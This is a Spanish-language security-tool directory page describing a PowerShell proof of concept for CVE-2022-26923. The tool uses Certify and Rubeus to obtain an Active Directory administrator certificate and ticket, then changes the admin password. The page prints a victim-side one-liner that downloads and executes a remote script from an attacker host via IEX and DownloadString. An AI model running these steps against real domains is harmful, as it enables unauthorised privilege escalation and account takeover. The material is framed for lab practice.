Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2022-26923-Powershell-POC — Un PoC de PowerShell para cargar y ejecutar automáticamente Certify y Rubeus desde la memoria. | Kitploit
Herramientas/GitHubGitHub/lsecqt/cve-2022-26923-powershell-poc
Escalada de PrivilegiosAnálisis de VulnerabilidadesExplotaciónPruebas de PenetraciónAprendizaje y EducaciónLabs y Práctica
GitHublsecqt/cve-2022-26923-powershell-poc

CVE-2022-26923-Powershell-POC

Un PoC de PowerShell para cargar y ejecutar automáticamente Certify y Rubeus desde la memoria.

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
Ver Repositorio
178hace 4 añosAún no revisado

CVE-2022-26923-Powershell-POC

Un PoC de PowerShell para cargar y ejecutar automáticamente Certify y Rubeus desde memoria.

¿Cómo funciona?

  1. Carga Certify.exe y Rubeus.exe en memoria.
  2. Escanea la máquina objetivo en busca de plantillas de certificados mal configuradas. (más información en https://www.youtube.com/watch?v=HBRCI5O35R8)
  3. Solicita un certificado para el usuario Administrativo, basado en la plantilla vulnerable.
  4. Envía el certificado al manejador de certificados, que lo convierte al formato .pfx y lo devuelve al cliente.
  5. Utiliza Rubeus para cargar el certificado y generar un ticket para el usuario Administrativo.
  6. Cambia la contraseña del usuario Administrativo. (Solo para la demo)

El PoC se ha probado en los siguientes laboratorios de TryHackMe: https://tryhackme.com/room/adcertificatetemplates

Este CVE se utiliza para la escalada de privilegios, por lo que esta demo no cubre la explotación inicial, ni el laboratorio de THM.

Pasos:

  1. python3 -m http.server 80 [Máquina del atacante]
  2. python3 uploader.py 8000 [Máquina del atacante]
  3. IEX(New-Object Net.WebClient).DownloadString('http://IP/poc.ps1') [Máquina de la víctima]

Nota: Este PoC tiene fines educativos, eres responsable de tus propias acciones.

Descargar herramienta